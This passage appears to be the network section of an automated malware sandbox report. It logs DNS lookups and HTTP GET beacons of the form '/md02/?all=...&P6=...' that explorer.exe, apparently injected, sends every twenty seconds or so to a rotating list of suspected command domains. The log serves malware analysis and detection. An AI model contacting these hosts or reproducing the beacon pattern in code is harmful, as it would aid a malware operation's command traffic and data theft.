                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:37.053241014 CEST5670753192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:37.257268906 CEST53567071.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:57.595525980 CEST6427553192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:57.865155935 CEST53642751.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:18.122241974 CEST6178053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:18.237570047 CEST53617801.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.523590088 CEST5407753192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.692815065 CEST53540771.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:59.206887960 CEST6222453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:59.339804888 CEST53622241.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:19.733747959 CEST6249153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:20.332827091 CEST53624911.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:40.276082993 CEST5812153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:40.378460884 CEST53581211.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:00.787173033 CEST6478953192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:00.956960917 CEST53647891.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:21.329531908 CEST5224253192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:21.607800961 CEST53522421.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:41.856215954 CEST5942753192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:41.962882042 CEST53594271.1.1.1192.168.11.20

                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.005553961 CEST192.168.11.201.1.1.10x907fStandard query (0)www.andrewghita.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:31.779261112 CEST192.168.11.201.1.1.10x8b65Standard query (0)www.attorney-services-8344642.zoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.165275097 CEST192.168.11.201.1.1.10xf9fStandard query (0)www.yeslabs.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.551325083 CEST192.168.11.201.1.1.10x318cStandard query (0)www.vizamag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.109369993 CEST192.168.11.201.1.1.10x8cdcStandard query (0)www.tigajco69.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:52.651804924 CEST192.168.11.201.1.1.10xce3eStandard query (0)www.zruypj169g.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:53.666908979 CEST192.168.11.209.9.9.90xce3eStandard query (0)www.zruypj169g.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:13.194088936 CEST192.168.11.201.1.1.10xcb43Standard query (0)www.pittsparking.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:54.278876066 CEST192.168.11.201.1.1.10x66e0Standard query (0)www.woby.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:14.821263075 CEST192.168.11.201.1.1.10xc783Standard query (0)www.j3k7n.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.412019014 CEST192.168.11.201.1.1.10x554aStandard query (0)www.upcyclecharms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:55.952914000 CEST192.168.11.201.1.1.10x7936Standard query (0)www.piedge-taiko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:16.495239019 CEST192.168.11.201.1.1.10x6d21Standard query (0)www.z8ggd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:37.053241014 CEST192.168.11.201.1.1.10x24d5Standard query (0)www.qqkartel88v1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:57.595525980 CEST192.168.11.201.1.1.10xc058Standard query (0)www.webuyandsellpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:18.122241974 CEST192.168.11.201.1.1.10x29cfStandard query (0)www.coinbureau.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.523590088 CEST192.168.11.201.1.1.10xdabStandard query (0)www.localhomeservicesadvisor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:59.206887960 CEST192.168.11.201.1.1.10x6a2fStandard query (0)www.saeutah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:19.733747959 CEST192.168.11.201.1.1.10x5e43Standard query (0)www.jalaios10.vipA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:40.276082993 CEST192.168.11.201.1.1.10xc488Standard query (0)www.chiri.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:00.787173033 CEST192.168.11.201.1.1.10x37fStandard query (0)www.equipoleiremnacional.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:21.329531908 CEST192.168.11.201.1.1.10x8571Standard query (0)www.rakring.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:41.856215954 CEST192.168.11.201.1.1.10x6056Standard query (0)www.rslotrank.winA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.175179958 CEST1.1.1.1192.168.11.200x907fNo error (0)www.andrewghita.comandrewghita.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.175179958 CEST1.1.1.1192.168.11.200x907fNo error (0)andrewghita.com172.66.0.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.063143015 CEST1.1.1.1192.168.11.200x8b65No error (0)www.attorney-services-8344642.zonessl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.063143015 CEST1.1.1.1192.168.11.200x8b65No error (0)ssl1.prod.systemdragon.com104.18.188.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.063143015 CEST1.1.1.1192.168.11.200x8b65No error (0)ssl1.prod.systemdragon.com104.18.187.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST1.1.1.1192.168.11.200xf9fNo error (0)www.yeslabs.xyzproxy-ssl.webflow.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST1.1.1.1192.168.11.200xf9fNo error (0)proxy-ssl.webflow.comproxy-ssl-geo.webflow.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST1.1.1.1192.168.11.200xf9fNo error (0)proxy-ssl-geo.webflow.com52.206.163.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST1.1.1.1192.168.11.200xf9fNo error (0)proxy-ssl-geo.webflow.com34.234.52.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST1.1.1.1192.168.11.200xf9fNo error (0)proxy-ssl-geo.webflow.com3.233.126.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST1.1.1.1192.168.11.200x318cNo error (0)www.vizamag.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST1.1.1.1192.168.11.200x318cNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST1.1.1.1192.168.11.200x318cNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST1.1.1.1192.168.11.200x318cNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST1.1.1.1192.168.11.200x318cNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.221383095 CEST1.1.1.1192.168.11.200x8cdcNo error (0)www.tigajco69.fun172.67.143.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.221383095 CEST1.1.1.1192.168.11.200x8cdcNo error (0)www.tigajco69.fun104.21.27.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST1.1.1.1192.168.11.200xce3eNo error (0)www.zruypj169g.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST1.1.1.1192.168.11.200xce3eNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST1.1.1.1192.168.11.200xce3eNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST1.1.1.1192.168.11.200xce3eNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST1.1.1.1192.168.11.200xce3eNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST9.9.9.9192.168.11.200xce3eNo error (0)www.zruypj169g.topwww.baidu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST9.9.9.9192.168.11.200xce3eNo error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST9.9.9.9192.168.11.200xce3eNo error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST9.9.9.9192.168.11.200xce3eNo error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST9.9.9.9192.168.11.200xce3eNo error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:13.310894966 CEST1.1.1.1192.168.11.200xcb43No error (0)www.pittsparking.com104.247.81.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:54.440768957 CEST1.1.1.1192.168.11.200x66e0No error (0)www.woby.xyz13.248.252.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:54.440768957 CEST1.1.1.1192.168.11.200x66e0No error (0)www.woby.xyz99.83.138.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:14.925124884 CEST1.1.1.1192.168.11.200xc783Name error (3)www.j3k7n.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST1.1.1.1192.168.11.200x554aNo error (0)www.upcyclecharms.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST1.1.1.1192.168.11.200x554aNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST1.1.1.1192.168.11.200x554aNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST1.1.1.1192.168.11.200x554aNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST1.1.1.1192.168.11.200x554aNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:56.084242105 CEST1.1.1.1192.168.11.200x7936Name error (3)www.piedge-taiko.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:37.257268906 CEST1.1.1.1192.168.11.200x24d5No error (0)www.qqkartel88v1.com172.67.130.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:37.257268906 CEST1.1.1.1192.168.11.200x24d5No error (0)www.qqkartel88v1.com104.21.3.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:57.865155935 CEST1.1.1.1192.168.11.200xc058No error (0)www.webuyandsellpa.comwebuyandsellpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:57.865155935 CEST1.1.1.1192.168.11.200xc058No error (0)webuyandsellpa.com63.141.128.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:18.237570047 CEST1.1.1.1192.168.11.200x29cfNo error (0)www.coinbureau.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:18.237570047 CEST1.1.1.1192.168.11.200x29cfNo error (0)www.coinbureau.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.692815065 CEST1.1.1.1192.168.11.200xdabNo error (0)www.localhomeservicesadvisor.comlocalhomeservicesadvisor.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.692815065 CEST1.1.1.1192.168.11.200xdabNo error (0)localhomeservicesadvisor.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:40.692815065 CEST1.1.1.1192.168.11.200xdabNo error (0)localhomeservicesadvisor.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:07:59.339804888 CEST1.1.1.1192.168.11.200x6a2fName error (3)www.saeutah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:08:40.378460884 CEST1.1.1.1192.168.11.200xc488Name error (3)www.chiri.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:00.956960917 CEST1.1.1.1192.168.11.200x37fNo error (0)www.equipoleiremnacional.comequipoleiremnacional.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:00.956960917 CEST1.1.1.1192.168.11.200x37fNo error (0)equipoleiremnacional.com192.250.227.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:21.607800961 CEST1.1.1.1192.168.11.200x8571No error (0)www.rakring.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:21.607800961 CEST1.1.1.1192.168.11.200x8571No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:09:41.962882042 CEST1.1.1.1192.168.11.200x6056Name error (3)www.rslotrank.winnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                • www.andrewghita.com
                                                                                                                                                                                                                                                                                • www.attorney-services-8344642.zone
                                                                                                                                                                                                                                                                                • www.yeslabs.xyz
                                                                                                                                                                                                                                                                                • www.vizamag.com
                                                                                                                                                                                                                                                                                • www.tigajco69.fun
                                                                                                                                                                                                                                                                                • www.upcyclecharms.com

                                                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                0192.168.11.2049736172.66.0.70804828C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.271385908 CEST166OUTGET /md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.andrewghita.com
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.387456894 CEST557INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:02:10 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Expires: Tue, 08 Oct 2024 15:02:10 GMT
                                                                                                                                                                                                                                                                                Location: https://www.andrewghita.com/md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8cf6aac688d97cac-EWR
                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                1192.168.11.2049738104.18.188.223804828C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.159362078 CEST181OUTGET /md02/?all=VJE6G0uhaXXjZ9YRdQlMdfAmJtBHOO9P9ftsD0Za8iws3BCdMQRNDr5e7yfdzu876eSq&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.attorney-services-8344642.zone
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.268712044 CEST406INHTTP/1.1 409 Conflict
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:02:32 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                Content-Length: 16
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8cf6ab4f4afa7d16-EWR
                                                                                                                                                                                                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                                                                                                                                                                                                                                                Data Ascii: error code: 1001


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                2192.168.11.204973952.206.163.162804828C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.423815966 CEST162OUTGET /md02/?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.yeslabs.xyz
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523401022 CEST432INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:02:51 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Location: https://www.yeslabs.xyz/md02?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY
                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                3192.168.11.2049740198.185.159.144804828C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.864633083 CEST162OUTGET /md02/?all=ItgQDVkBdIs0QziWKwlLzzQfsI1xbGOZBoDnu4i2Zg+9o67qJyVsSqA76p+pq/A3lGOx&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.vizamag.com
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.962738991 CEST1276INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                Content-Length: 2061
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 14:03:11 UTC
                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Server: Squarespace
                                                                                                                                                                                                                                                                                X-Contextid: axS4pUth/BsnNyiGA
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px;
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.962840080 CEST1084INData Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72
                                                                                                                                                                                                                                                                                Data Ascii: font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "Helvetica Neue", Helv


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                4192.168.11.2049741172.67.143.211804828C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.317439079 CEST164OUTGET /md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY HTTP/1.1
                                                                                                                                                                                                                                                                                Host: www.tigajco69.fun
                                                                                                                                                                                                                                                                                Connection: close
